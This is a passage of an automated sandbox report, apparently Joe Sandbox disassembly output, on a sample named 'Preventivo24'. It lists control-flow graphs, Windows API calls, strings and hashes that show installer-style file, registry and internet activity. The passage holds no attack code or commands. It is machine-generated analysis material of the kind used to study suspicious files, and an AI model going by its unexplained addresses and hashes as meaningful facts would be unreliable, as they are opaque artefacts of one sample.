                                                                              • Instruction Fuzzy Hash: 82B10231E00249DFDB05DBA8CC55BAEBBB5EF04320F184169E925A73D1DB749E05CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2425 fc7a40-fc7a86 call fc2a50 2428 fc7a8c-fc7aa8 SHGetFolderPathW 2425->2428 2429 fc7d7f-fc7d87 call fc7e20 2425->2429 2431 fc7aba-fc7ac9 2428->2431 2432 fc7aaa 2428->2432 2437 fc7d8b-fc7da8 call 108a6f5 2429->2437 2435 fc7acb 2431->2435 2436 fc7ae2-fc7af3 call fa0100 2431->2436 2434 fc7ab0-fc7ab8 2432->2434 2434->2431 2434->2434 2438 fc7ad0-fc7ad8 2435->2438 2443 fc7af5 2436->2443 2444 fc7b17-fc7b41 call e933c0 call fae210 2436->2444 2438->2438 2441 fc7ada-fc7adc 2438->2441 2441->2429 2441->2436 2446 fc7b00-fc7b0c 2443->2446 2452 fc7b45-fc7b52 call e8b400 2444->2452 2453 fc7b43 2444->2453 2446->2429 2448 fc7b12-fc7b15 2446->2448 2448->2444 2448->2446 2456 fc7b58-fc7b7c 2452->2456 2457 fc7dab-fc7db0 call e8b070 2452->2457 2453->2452 2464 fc7b7e-fc7b84 2456->2464 2465 fc7bb1 2456->2465 2459 fc7db5-fc7de9 call e8b070 2457->2459 2466 fc7deb-fc7ded DeleteFileW 2459->2466 2467 fc7df3-fc7e0c call 108aca0 2459->2467 2468 fc7b86-fc7b95 call e8a880 2464->2468 2469 fc7b97-fc7b9c 2464->2469 2470 fc7bb3-fc7bbb call e8aee0 2465->2470 2466->2467 2478 fc7bc0-fc7be9 call e88ed0 * 2 2468->2478 2473 fc7ba0-fc7ba9 2469->2473 2470->2478 2473->2473 2477 fc7bab-fc7baf 2473->2477 2477->2470 2483 fc7c18-fc7c4d call 108c910 GetTempFileNameW 2478->2483 2484 fc7beb-fc7bf0 2478->2484 2490 fc7c4f-fc7c55 call 108aca0 2483->2490 2491 fc7c58-fc7c67 2483->2491 2484->2459 2485 fc7bf6-fc7bf8 2484->2485 2485->2459 2487 fc7bfe-fc7c03 2485->2487 2487->2483 2489 fc7c05-fc7c12 call ea5d30 2487->2489 2489->2483 2490->2491 2494 fc7c69 2491->2494 2495 fc7c7a-fc7ca4 call 108aca5 2491->2495 2499 fc7c70-fc7c78 2494->2499 2501 fc7cc8-fc7d15 Wow64DisableWow64FsRedirection CopyFileW 2495->2501 2502 fc7ca6-fc7caf 2495->2502 2499->2495 2499->2499 2504 fc7d1f-fc7d2a 2501->2504 2505 fc7d17-fc7d1a call fc7e20 2501->2505 2503 fc7cb1-fc7cc0 2502->2503 2503->2503 2506 fc7cc2 2503->2506 2508 fc7d4c-fc7d61 2504->2508 2509 fc7d2c-fc7d46 Wow64RevertWow64FsRedirection 2504->2509 2505->2504 2506->2501 2508->2437 2510 fc7d63-fc7d7d 2508->2510 2509->2508 2510->2437
                                                                              APIs
                                                                              • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,B5580983,00000000,00000000,?), ref: 00FC7A9B
                                                                              • GetTempFileNameW.KERNEL32(?,shim_clone,00000000,?,?,00000000,00000000), ref: 00FC7C3D
                                                                              • Wow64DisableWow64FsRedirection.KERNEL32(00000000,?,?,00000000,00000000), ref: 00FC7CE4
                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000000,00000000), ref: 00FC7D06
                                                                              • Wow64RevertWow64FsRedirection.KERNEL32(00000000,?,?,00000000), ref: 00FC7D32
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              • DeleteFileW.KERNEL32(?,B5580983,00000000,00000000,010B1B50,000000FF,?,80070057,80004005,?), ref: 00FC7DED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Wow64$File$Redirection$AllocateCopyDeleteDisableFolderHeapNamePathRevertTemp
                                                                              • String ID: shim_clone
                                                                              • API String ID: 4011074531-3944563459
                                                                              • Opcode ID: a3f9e2de153ef8256dae9bb0023cf8142c6b5d89ff1d9daf326568e1b48223f8
                                                                              • Instruction ID: d803ed96398f787005e7c9932848bd908bd7b24443ded8fd3c470b62134ec1b6
                                                                              • Opcode Fuzzy Hash: a3f9e2de153ef8256dae9bb0023cf8142c6b5d89ff1d9daf326568e1b48223f8
                                                                              • Instruction Fuzzy Hash: B8B1057090475A8FDB24EB24CD45BAAB7F5EF44310F1440EDE90AA7281EB34AE45CF54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2513 fbad40-fbae11 call e87cf0 call fbb490 2518 fbae13-fbae3d call e88ed0 2513->2518 2519 fbae40-fbae4a 2513->2519 2518->2519 2521 fbae7e-fbae97 2519->2521 2522 fbae4c-fbae5e 2519->2522 2526 fbae9d-fbaea3 2521->2526 2527 fbaf56-fbaf74 2521->2527 2524 fbae60-fbae6e 2522->2524 2525 fbae74-fbae7b call 108a703 2522->2525 2524->2525 2530 fbb05b-fbb060 call 108fa4f 2524->2530 2525->2521 2532 fbaea7-fbaead 2526->2532 2533 fbaea5 2526->2533 2528 fbaf78-fbaf8a 2527->2528 2529 fbaf76 2527->2529 2534 fbafe9-fbaff8 RegOpenKeyExW 2528->2534 2535 fbaf8c-fbaf8f 2528->2535 2529->2528 2538 fbaecb-fbaedd call e87cf0 2532->2538 2539 fbaeaf-fbaec9 call e88730 2532->2539 2533->2532 2545 fbaffe-fbb003 2534->2545 2541 fbafe3-fbafe7 2535->2541 2542 fbaf91-fbaf9e GetModuleHandleW 2535->2542 2552 fbaee2-fbaf04 call e8a300 2538->2552 2539->2552 2541->2534 2549 fbb02f 2541->2549 2542->2549 2550 fbafa4-fbafba GetProcAddress 2542->2550 2546 fbb032-fbb058 call 108a6f5 2545->2546 2547 fbb005-fbb009 2545->2547 2553 fbb00b-fbb012 RegCloseKey 2547->2553 2554 fbb018-fbb02d 2547->2554 2549->2546 2550->2549 2556 fbafbc-fbafe1 2550->2556 2561 fbaf08-fbaf2a call e886c0 call e88ed0 2552->2561 2562 fbaf06 2552->2562 2553->2554 2554->2546 2556->2545 2568 fbaf3d-fbaf46 2561->2568 2569 fbaf2c-fbaf3a call e88ed0 2561->2569 2562->2561 2568->2527 2570 fbaf48-fbaf51 call e88ed0 2568->2570 2569->2568 2570->2527
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,B5580983), ref: 00FBAF96
                                                                              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00FBAFAA
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00FBB00C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseHandleModuleProc
                                                                              • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                              • API String ID: 4190037839-3913318428
                                                                              • Opcode ID: 10c43c516ee70e1484fdbad3f521ffb1f9d554b5e2a300041a97e067c622e0fb
                                                                              • Instruction ID: acb9ef8977bd3649b96e60457c7b4b7520717bf5cbca2fb6fdfd06e2521d9fd9
                                                                              • Opcode Fuzzy Hash: 10c43c516ee70e1484fdbad3f521ffb1f9d554b5e2a300041a97e067c622e0fb
                                                                              • Instruction Fuzzy Hash: A9A17DB0D00208DFDB24DF69C945BAEBBF4BF48314F10855DE869A7281DB74AA44DF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,?), ref: 00FE9C6E
                                                                              • SetFilePointer.KERNEL32(?,7FFFFFFF,00000000,00000000,?), ref: 00FE9CD0
                                                                              • SetEndOfFile.KERNEL32(?), ref: 00FE9CD9
                                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 00FE9CF2
                                                                              Strings
                                                                              • Not enough disk space to extract file:, xrefs: 00FE9B4B
                                                                              • %sholder%d.aiph, xrefs: 00FE9C4A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$ChangeCloseCreateFindNotificationPointer
                                                                              • String ID: %sholder%d.aiph$Not enough disk space to extract file:
                                                                              • API String ID: 3635197886-929304071
                                                                              • Opcode ID: 6fd002580227d3400bb98be6f02150c613622f0b4deba0ce3d8ca7e786cffe23
                                                                              • Instruction ID: 673423064845e95f68668301c8daacea42d0347aa25e04c10b4e114f43a3fd61
                                                                              • Opcode Fuzzy Hash: 6fd002580227d3400bb98be6f02150c613622f0b4deba0ce3d8ca7e786cffe23
                                                                              • Instruction Fuzzy Hash: 6791CD75E042099BCB14DF69CC45BAEB7B5FF88320F244629E825A7391DB75AD01CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(000000FF,-00000400,?,00000002,00000400,B5580983,?,?,?), ref: 01008696
                                                                              • GetLastError.KERNEL32(?,?,?), ref: 010086A4
                                                                              • ReadFile.KERNEL32(000000FF,00000000,00000400,?,00000000,?,?,?), ref: 010086BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: File$ErrorLastPointerRead
                                                                              • String ID: ADVINSTSFX
                                                                              • API String ID: 64821003-4038163286
                                                                              • Opcode ID: 47c201b1a2356d6e71702956eb991b95e3f97db75802ca0e3eaacaec1cabb829
                                                                              • Instruction ID: 6b181d55ff1bfb35cc7a35df53294c68c01fae0fd36d9832110e80edc46f9957
                                                                              • Opcode Fuzzy Hash: 47c201b1a2356d6e71702956eb991b95e3f97db75802ca0e3eaacaec1cabb829
                                                                              • Instruction Fuzzy Hash: 8061D475E002098BEB16CF68C880BBEBBF5FB49314F1482AAE555A72C5D734D941CB64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RemoveDirectoryW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,?,010B6CAD,000000FF,?,00FBD638,?), ref: 00FBD390
                                                                                • Part of subcall function 00E8A880: FindResourceW.KERNEL32(00000000,?,00000006,?,?,?,?,?,?,?), ref: 00E8A8A3
                                                                              • RemoveDirectoryW.KERNEL32(?,B5580983,?,?,00000000,?,?,010B6CAD,000000FF,?,00FBD638,?,00000000), ref: 00FBD3CB
                                                                              • GetLastError.KERNEL32(?,B5580983,?,?,00000000,?,?,010B6CAD,000000FF,?,00FBD638,?,00000000), ref: 00FBD3DB
                                                                              • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983), ref: 00FBD4B0
                                                                              • GetLastError.KERNEL32(?,?,00000000,?,00000000,010B6CAD,000000FF,?,80004005,B5580983,?,?,00000000,?,?,010B6CAD), ref: 00FBD4FB
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryErrorLastRemove$DeleteFileFindHeapProcessResource
                                                                              • String ID: \\?\
                                                                              • API String ID: 728736790-4282027825
                                                                              • Opcode ID: 52c11c41b31f0855d4a4e7d792b04238134ca84e5ad38631f5ff4222c4db54e4
                                                                              • Instruction ID: a3db61d0d729a64e586490a5f0e77142de9d901afbbbc05d486b0c203be5edb8
                                                                              • Opcode Fuzzy Hash: 52c11c41b31f0855d4a4e7d792b04238134ca84e5ad38631f5ff4222c4db54e4
                                                                              • Instruction Fuzzy Hash: 5551D136A00618DFDB14DFA9C845BAEB7F4FF05720F184569E825E7381EB7898009F92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00E9C25F
                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00E9C26E
                                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00E9C289
                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00E9C2A3
                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 00E9C2B5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$CallProc
                                                                              • String ID: $
                                                                              • API String ID: 513923721-3993045852
                                                                              • Opcode ID: 56429f8f8be1b321a491c606b7e9824fadc6f43a26f5d4a9fdb1f92cc538c50b
                                                                              • Instruction ID: b746e1acd727335417459b70dcf6ade232960ce1a303c15c4e0a81278b373e45
                                                                              • Opcode Fuzzy Hash: 56429f8f8be1b321a491c606b7e9824fadc6f43a26f5d4a9fdb1f92cc538c50b
                                                                              • Instruction Fuzzy Hash: 6A417AB1609706AFC704DF59C884A1AFBF5FF89324F144A1AF964932A0C732E894CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(Advapi32.dll,B5580983,00000000), ref: 00FA65B5
                                                                              • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00FA65DE
                                                                              • RegCreateKeyExW.KERNEL32(?,00FBB09F,00000000,00000000,00000000,00000000,00000000,00000000,?,B5580983,00000000), ref: 00FA6637
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00FA664A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseCreateHandleModuleProc
                                                                              • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                              • API String ID: 1765684683-2994018265
                                                                              • Opcode ID: 24a075f923908d878548abe4e86cf9857485d2b1595afc5af401c0bba34a9c77
                                                                              • Instruction ID: ea77e312487c095d9779c18bc840450b16ba8c3346e84c215ee9e4231d130c10
                                                                              • Opcode Fuzzy Hash: 24a075f923908d878548abe4e86cf9857485d2b1595afc5af401c0bba34a9c77
                                                                              • Instruction Fuzzy Hash: 4E316F72B44209EFDB248F55DC45FAABBB8FB05720F14412AF915EB380E775A840DB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00FE1DDD
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FE1DF3
                                                                              • ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E08
                                                                              • InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00FEBA1D), ref: 00FE1E13
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00FE1E21
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00FE1E37
                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00FE1E76
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$Item$InvalidateShow
                                                                              • String ID:
                                                                              • API String ID: 2147159307-0
                                                                              • Opcode ID: 4f3440c939e81dab1ca345998e5fae568a74453e3ab4ca7214ea2d309ed7629d
                                                                              • Instruction ID: 7f25a13d4222182b86856019936773ac833ea8047fd6e762460f8330ac4ee672
                                                                              • Opcode Fuzzy Hash: 4f3440c939e81dab1ca345998e5fae568a74453e3ab4ca7214ea2d309ed7629d
                                                                              • Instruction Fuzzy Hash: E8215E7160A701AFD314DF25DD49B6ABBE8FF89600F008629F459D2184EB70ED908B95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,00FF877A,00000000,B5580983,?,?,00000000), ref: 00FFAA4E
                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,00FF877A,00000000,B5580983,?,?,00000000), ref: 00FFAA79
                                                                              • InternetOpenW.WININET(AdvancedInstaller,00000003,?,00000000,10000000), ref: 00FFAACF
                                                                              • GetLastError.KERNEL32(00FF877A,00000000,B5580983,?,?,00000000,?,?,?,?,?,01101115,000000FF,?,00FF81B2,?), ref: 00FFAAE3
                                                                              • InternetSetStatusCallbackW.WININET(00000000,00FFAB00), ref: 00FFAAF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CreateEventInternet$CallbackErrorLastOpenStatus
                                                                              • String ID: AdvancedInstaller
                                                                              • API String ID: 2592705480-1372594473
                                                                              • Opcode ID: 73f05fa66664e5369bafcbade3da57444a46083cba3825c390437a5a0094d531
                                                                              • Instruction ID: c6a173c4ebb6f78a5836faab8cafdafe478694d1656634ad502141dcacba23e2
                                                                              • Opcode Fuzzy Hash: 73f05fa66664e5369bafcbade3da57444a46083cba3825c390437a5a0094d531
                                                                              • Instruction Fuzzy Hash: E7218E75640308EFDB24EF21CE89F26BBA8EF45714F100069FA159B2DADB71E845CB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000000,B5580983,00000000), ref: 00FE6647
                                                                              • GetLastError.KERNEL32 ref: 00FE697A
